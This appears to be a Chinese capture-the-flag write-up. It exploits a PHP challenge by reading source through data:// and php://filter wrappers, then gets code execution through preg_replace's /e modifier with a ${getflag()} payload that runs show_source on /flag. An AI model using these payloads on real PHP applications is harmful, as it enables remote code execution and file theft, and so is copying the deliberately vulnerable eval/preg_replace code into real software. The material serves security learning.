知识点:伪协议php://input
参考:深入研究preg_replace与代码执行
读源码
file_get_contents()函数打开text参数,以及后面的文件包含函数,用data伪协议和php伪协议传
text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。
?\S*=${getflag()}&cmd=show_source(%22/flag%22);
preg_replace('/(S*)/ie','strtolower("${getflag()}")','${getflag()}')
第一部分正则匹配到${getflag()}又因为/e模式,使得${getflag()}被当作php代码执行,执行成功返回1,
strtolower(1)
foreach($_GET as $re => $str)
因为$_GET为数组(这边没用$_GET[‘xxx’]),所以我们可以传一个名为\S*的正则表达式,让其匹配到 ${getflag()} 即可执行 getflag() 函数,再传cmd
为什么要匹配到 ${getflag()} ,才能执行 getflag() 函数,这是 PHP可变变量 的原因。在PHP中双引号包裹的字符串中可以解析变量,而单引号则不行。 ${getflag()} 中的 getflag() 会被当做变量先执行,执行后,即变成 ${1} (getflag()成功执行返回true)。